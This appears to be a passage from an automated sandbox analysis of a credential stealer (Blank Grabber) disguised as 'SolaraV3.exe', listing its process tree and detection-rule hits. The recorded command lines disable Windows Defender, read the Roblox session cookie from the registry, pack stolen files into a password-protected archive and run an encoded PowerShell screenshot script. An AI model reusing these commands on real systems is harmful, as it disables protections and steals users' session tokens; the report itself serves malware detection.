        • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8176 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • Conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7976 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8184 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 5380 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 7160 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 2324 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 1424 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 5968 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 7616 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 7832 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 7200 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7052 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7948 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 4544 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7252 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7176 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7640 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7732 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7636 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7592 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7316 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7988 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7284 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8024 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 7696 cmdline: C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 3724 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6612 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7196 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7452 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2564 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3044 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 4216 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7584 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8040 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6924 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 7 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SolaraV3.exe", ParentImage: C:\Users\user\Desktop\SolaraV3.exe, ParentProcessId: 4892, ParentProcessName: SolaraV3.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'", ProcessId: 1652, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SolaraV3.exe", ParentImage: C:\Users\user\Desktop\SolaraV3.exe, ParentProcessId: 4892, ParentProcessName: SolaraV3.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 1660, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SolaraV3.exe", ParentImage: C:\Users\user\Desktop\SolaraV3.exe, ParentProcessId: 4892, ParentProcessName: SolaraV3.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *", ProcessId: 8024, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\SolaraV3.exe, ProcessId: 4892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAA